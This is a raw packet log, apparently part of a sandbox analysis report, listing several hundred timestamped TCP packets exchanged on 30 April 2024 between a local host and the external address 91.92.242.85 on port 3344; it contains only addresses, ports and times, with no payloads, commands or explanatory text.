Apr 30, 2024 07:59:55.930679083 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930679083 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930691957 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930701971 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930705070 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930720091 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930740118 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930742979 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930752993 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930763960 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930767059 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930780888 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930788040 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930795908 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930809021 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930816889 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930821896 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930835962 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930847883 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930849075 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930864096 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930876970 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930876970 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930890083 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930902004 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930903912 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930917025 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930926085 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930953979 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125466108 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125488043 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125499964 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125518084 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125531912 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125546932 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125559092 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125555038 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125572920 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125586987 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125605106 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125617981 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125617981 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125632048 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125639915 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125644922 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125658035 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125670910 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125677109 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125684977 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.125708103 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.125722885 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.374563932 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568711042 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568737984 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568757057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568770885 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568783998 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568797112 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568798065 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568809986 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568824053 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568825006 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568837881 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568851948 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568860054 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568865061 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568869114 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568881035 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568896055 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568902969 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568911076 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568923950 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568934917 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568936110 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568948984 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568953991 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568962097 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568975925 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568977118 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.568989038 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.568999052 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569001913 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569016933 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569022894 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569030046 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569042921 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569053888 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569053888 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569070101 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569082975 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569083929 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569097042 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569108009 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569119930 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569122076 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569135904 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569148064 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569148064 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569168091 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569169044 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569186926 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569190979 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569200039 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569212914 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569225073 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569226027 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569240093 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569246054 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.569253922 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.569271088 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.608859062 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763174057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763199091 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763211966 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763226032 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763240099 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763256073 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763269901 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763283014 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763295889 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763305902 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763309956 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763323069 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763335943 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763340950 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763355017 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763356924 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763370991 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763376951 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763386965 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763400078 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763406992 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763413906 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763427019 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763434887 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763439894 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763453960 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763467073 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763470888 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763480902 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763494015 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763500929 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763505936 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763520002 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763525963 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763531923 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763545036 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763550043 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763557911 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763566971 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763571978 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763586044 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763600111 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763608932 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763618946 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763631105 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763632059 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763645887 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763658047 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763663054 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763670921 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763683081 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763690948 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763699055 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.763719082 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.763746977 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.802702904 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.843262911 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:56.957468033 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:56.999479055 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.027554989 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221673012 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221699953 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221713066 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221726894 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221740007 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221752882 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221755981 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221769094 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221781015 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221790075 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221801043 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221833944 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221833944 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221848965 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221862078 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221869946 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221877098 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221892118 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221904039 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221904993 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221927881 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221934080 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221945047 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221959114 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221971035 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221973896 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.221985102 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221997976 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.221998930 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222009897 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222022057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222023010 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222035885 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222043037 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222048998 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222062111 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222073078 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222073078 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222095013 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222095013 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222110033 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222122908 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222136974 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222141027 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222153902 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222166061 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222172022 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222183943 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222184896 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222198009 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222210884 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222214937 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222223043 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222237110 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222248077 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.222249985 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.222266912 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.265156984 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416533947 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416562080 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416574955 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416589975 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416605949 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416620016 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416630983 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416646957 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416641951 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416665077 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416678905 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416698933 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416712999 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416721106 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416726112 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416738987 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416749954 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416753054 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416768074 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416781902 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416785955 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416796923 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416809082 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416816950 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416831017 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416837931 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416845083 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416860104 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416867018 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416873932 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416887999 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416897058 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416899920 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416913986 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416922092 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416929007 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416941881 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416948080 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416956902 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416970968 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416979074 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.416981936 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.416996002 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417006969 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.417007923 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417021990 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417026997 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.417036057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417047977 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417058945 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.417061090 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417076111 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.417082071 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.417113066 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.458890915 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.499496937 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611186981 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611221075 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611233950 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611247063 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611260891 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611268997 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611274958 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611289978 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611291885 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611304998 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611324072 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611330032 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611339092 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611351013 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611351967 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611366034 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611372948 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611381054 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611393929 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611401081 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611407042 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611421108 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611433983 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611444950 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611445904 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611462116 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611469030 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611475945 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611484051 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611490011 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611502886 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611507893 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611516953 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611531019 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611540079 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611546040 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611561060 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611573935 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611586094 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611597061 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611603022 CEST	49711	3344	192.168.2.7	91.92.242.85
